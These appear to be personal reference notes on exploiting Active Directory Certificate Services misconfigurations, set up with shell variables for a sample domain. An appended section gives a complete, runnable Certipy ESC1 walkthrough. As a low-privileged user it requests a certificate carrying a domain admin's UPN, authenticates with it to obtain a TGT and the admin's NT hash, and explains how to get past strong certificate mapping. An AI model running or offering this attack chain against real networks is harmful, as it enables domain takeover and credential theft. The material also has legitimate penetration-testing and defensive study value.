Exploiting AD CS Misconfigurations
These are some scribbles if I ever need to look up how to exploit AD CS misconfigurations, such as ESC1. I might expand on this later…

Note
This is nothing new; most of this stuff can be easily found on the Internet. This is just for my own reference. Please excuse my brevity.

Environment
For this article, we're assuming the following (YMMV):

user $ echo $SHELL
/usr/bin/fish
user $ which certipy
/usr/bin/certipy
user $ which dasel
/usr/bin/dasel
user $ set win_domain company.org
user $ set dc_fqdn dc.{$win_domain}
user $ set dc_ip 192.168.1.1
user $ set ca_fqdn ca.{$win_domain}
user $ set ca_ip 192.168.1.10
user $ set ca_name COMPANYCA
user $ set esc1_template_name ESC1Template
user $ set regular_ad_user gijsbert
user $ set domain_admin dawilbert
user $ set domain_admin_upn {$domain_admin}@{$win_domain}
...
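As an added example (not part of the original notes), here is the ESC1 walkthrough those variables are set up for, written as a fish script against the Certipy 4.x CLI. It assumes everything from the Environment block above plus one extra variable I introduce here, `regular_ad_user_pass`, holding the low-privileged user's password; the value shown is a constructed placeholder. The `.pfx` and `.ccache` file names are what Certipy normally derives from the certificate's UPN, which is an assumption about its output rather than something the notes state.

```fish
# Added example, not from the original post. Assumes the variables from the
# Environment section plus $regular_ad_user_pass (my addition, placeholder value).
set regular_ad_user_pass 'Summer2024!'   # constructed placeholder, not a real credential

# 1. Confirm the misconfiguration. -vulnerable limits output to what Certipy
#    flags; an ESC1 template is enabled, enrollable by a broad group, has
#    "Enrollee Supplies Subject", an EKU allowing client authentication, and
#    no manager approval / authorized-signature requirement.
certipy find -u {$regular_ad_user}@{$win_domain} -p $regular_ad_user_pass \
    -dc-ip $dc_ip -vulnerable -stdout

# 2. Request a certificate from the ESC1 template with the domain admin's UPN
#    in the SAN. The CA issues it because the template lets the enrollee pick
#    the subject and nobody has to approve the request.
certipy req -u {$regular_ad_user}@{$win_domain} -p $regular_ad_user_pass \
    -dc-ip $dc_ip -ca $ca_name -target $ca_fqdn \
    -template $esc1_template_name -upn $domain_admin_upn
# Certipy saves the result as <upn user part>.pfx, i.e. dawilbert.pfx here (assumption).

# 3. PKINIT with that certificate: Certipy obtains a TGT as the domain admin,
#    writes a ccache, and uses it to recover the account's NT hash.
certipy auth -pfx {$domain_admin}.pfx -dc-ip $dc_ip

# 4. Hand the ccache to Impacket-style tooling via KRB5CCNAME.
set -x KRB5CCNAME (pwd)/{$domain_admin}.ccache
```

One caveat worth checking before step 3: on domain controllers that enforce strong certificate mapping (the KB5014754 changes), a certificate without the SID security extension is rejected at PKINIT even though the CA happily issued it; newer Certipy releases add a `-sid` option to `req` for exactly this case, so if `auth` fails with a certificate mismatch error, re-request with the target account's SID.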